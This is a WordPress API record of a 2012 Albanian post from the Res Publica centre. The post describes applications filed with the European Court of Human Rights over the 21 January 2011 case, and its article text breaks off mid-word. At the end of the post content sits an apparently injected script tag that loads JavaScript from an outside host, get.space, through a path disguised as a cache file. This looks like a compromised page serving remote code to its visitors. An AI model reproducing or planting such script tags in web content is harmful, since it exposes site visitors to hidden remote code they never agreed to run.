{"id":433,"date":"2012-12-14T23:31:40","date_gmt":"2012-12-14T21:31:40","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=433"},"modified":"2013-09-27T23:32:56","modified_gmt":"2013-09-27T21:32:56","slug":"21-janari-azil-ne-strasburg","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=433","title":{"rendered":"21 janari \u201cazil\u201d n\u00eb Strasburg"},"content":{"rendered":"<p align=\"JUSTIFY\">N\u00eb dat\u00ebn 5 dhjetor 2012 qendra Res Publica, pasi formuloi k\u00ebrkesat p\u00ebr Ana Veizi, Klajdi Veizi, \u00c7aush Veizi dhe Zabit Deda i postoi ato p\u00ebr n\u00eb Gjykat\u00ebn Europiane p\u00ebr t\u00eb Drejtat e Njeriut me seli ne Strasburg.<\/p>\n<p align=\"JUSTIFY\">Ana dhe Klajdi Veizi pasi k\u00ebrkuan dhe ju refuzua nga gjykata e Tiran\u00ebs, t\u00eb ishin pjes\u00eb e procesit p\u00ebr 21 janarin 2011, ngjarje n\u00eb t\u00eb cil\u00ebn humbi jet\u00ebn babai i tyre, ata ju drejtuan gjykat\u00ebs s\u00eb Strasburgut p\u00ebr shkelje t\u00eb an\u00ebs procedurale t\u00eb nenit 2 dhe nenit 13 t\u00eb KEDNJ. Ana dhe Klajdi Veizi dor\u00ebzuan n\u00eb gjykat\u00ebn e Tiran\u00ebs k\u00ebrkes\u00ebn n\u00eb koh\u00ebn e duhur, duke paguar dhe nj\u00eb pjes\u00eb t\u00eb taks\u00ebs s\u00eb padis\u00eb. Pamund\u00ebsia e tyre p\u00ebr paguar t\u00eb gjith\u00eb vler\u00ebn q\u00eb do t\u00eb korrespondonte 3% t\u00eb vler\u00ebs s\u00eb padis\u00eb, i mjaftoi seksionit penal t\u00eb gjykat\u00ebs s\u00eb Tiran\u00ebs q\u00eb t\u2019u mohonte t\u00eb miturve aksesin n\u00eb drejt\u00ebsi.<\/p>\n<p align=\"JUSTIFY\">\u00c7aush Veizi dhe Zabit Deda ju drejtuan me k\u00ebrkes\u00ebn e m\u00ebsip\u00ebrme Gjykat\u00ebs Europiane t\u00eb t\u00eb Drejtave t\u00eb Njeriut, p\u00ebr shkak se atyre iu mohua e drejta p\u00ebr akses n\u00eb dosjen e t\u00eb nj\u00ebjt\u00ebs \u00e7\u00ebshtje. Pas dy k\u00ebrkesash drejtuar Prokuroris\u00eb, \u00c7aush Veizi dhe Zabit Deda me asistenc\u00ebn e Res Publica ju drejtuan gjykat\u00ebs. Pas 9 seancash gjyq\u00ebsore, n\u00eb t\u00eb cilat prokuroria mungoi q\u00ebllimisht duke injoruar thirrjet e nj\u00ebpasnj\u00ebshme t\u00eb gjyqtares Regleta Panajoti, \u00e7\u00ebshtja u pushua p\u00ebr shkak se nd\u00ebrkoh\u00eb paralelisht filloi \u00e7\u00ebshtja e njohur si \u201cprocesi i 21 janarit\u201d n\u00eb gjykat\u00ebn e Rrethit Tiran\u00eb.<\/p>\n<p align=\"JUSTIFY\">Ana Veizi, Klajdi Veizi, \u00c7aush Veizi dhe Zabit Deda jan\u00eb n\u00eb pritje t\u00eb komunikimit nga Gjykata Europiane e t\u00eb Drejtave t\u00eb Njeriut p\u00ebr shkak se drejt\u00ebsia k\u00ebtu nuk u komunikoi asnj\u00ebher\u00eb asgj\u00eb p\u00ebr m\u00eb shum\u00eb s\u00eb nj\u00eb vit e gjysm\u00eb. Kjo konsiderohet koh\u00eb e humbur p\u00ebr standardet e drejt\u00ebsis\u00eb efek<\/p>\n<p><script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>N\u00eb dat\u00ebn 5 dhjetor 2012 qendra Res Publica, pasi formuloi k\u00ebrkesat p\u00ebr Ana Veizi, Klajdi Veizi, \u00c7aush Veizi dhe Zabit [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":434,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/433"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=433"}],"version-history":[{"count":1,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/433\/revisions"}],"predecessor-version":[{"id":435,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/433\/revisions\/435"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/434"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=433"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=433"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=433"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}